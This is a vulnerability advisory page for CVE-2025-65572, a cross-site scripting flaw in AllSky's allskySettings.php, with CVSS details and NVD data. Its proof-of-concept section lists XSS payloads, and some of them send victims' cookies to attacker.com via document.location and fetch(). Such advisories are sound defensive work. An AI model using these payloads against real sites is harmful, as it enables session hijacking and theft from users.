Security Vulnerability Report
CVE-2025-65572 CVSS 6.1 MEDIUM


Published: 2025-12-09 19:15:50
Last Modified: 2025-12-16 20:03:52

Description

Cross Site Scripting (XSS) vulnerability in AllskyTeam AllSky v2024.12.06_06 allows remote attackers to execute arbitrary code via the (1) config, (2) filename, or (3) extratext parameter to allskySettings.php. When the page is reloaded or when a user visits allskySettings.php, the showMessages() function in status_messages.php will print out the error messages and execute the script injected by the attacker.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:allskyteam:allsky:2024.12.06_06:*:*:*:*:*:*:* - VULNERABLE
AllskyTeam AllSky v2024.12.06_06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-65572 PoC - Stored XSS in AllSky allskySettings.php -->
<!-- Inject via config parameter -->
https://[target]/allskySettings.php?config=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
<!-- Inject via filename parameter -->
https://[target]/allskySettings.php?filename=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E
<!-- Inject via extratext parameter -->
https://[target]/allskySettings.php?extratext=%3Cscript%3Edocument.location=%27https://attacker.com/steal?c=%27+document.cookie%3C/script%3E
<!-- Example HTML form for exploitation -->
<form action="https://[target]/allskySettings.php" method="GET">
  <input type="hidden" name="config" value='"><script>fetch("https://attacker.com/log?cookie="+document.cookie)</script>'>
  <input type="submit" value="Exploit">
</form>

References

https://gh0stmezh.wordpress.com/2025/12/04/cve-2025-65572/ (Exploit, Third Party Advisory)
https://github.com/AllskyTeam/allsky (Product)
https://github.com/AllskyTeam/allsky/blob/master/html/includes/allskySettings.php (Product)
https://github.com/AllskyTeam/allsky/blob/master/html/includes/status_messages.php (Product)

Weakness: CWE-79
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65572", "sourceIdentifier": "[email protected]", "published": "2025-12-09T19:15:49.533", "lastModified": "2025-12-16T20:03:52.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting (XSS) vulnerability in AllskyTeam AllSky v2024.12.06_06 allows remote attackers to execute arbitrary code via the (1) config, (2) filename, or (3) extratext parameter to allskySettings.php. When the page is reloaded or when user visits allskySettings.php, the showMessages() function in status_messages.php will print out the error messages and execute the script injected by the attacker."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:allskyteam:allsky:2024.12.06_06:*:*:*:*:*:*:*", "matchCriteriaId": "E0704121-18E0-4B0F-9ACB-29812AC92F63"}]}]}], "references": [{"url": "https://gh0stmezh.wordpress.com/2025/12/04/cve-2025-65572/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/AllskyTeam/allsky", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/AllskyTeam/allsky/blob/master/html/includes/allskySettings.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/AllskyTeam/allsky/blob/master/html/includes/status_messages.php", "source": "[email protected]", "tags": ["Product"]}]}}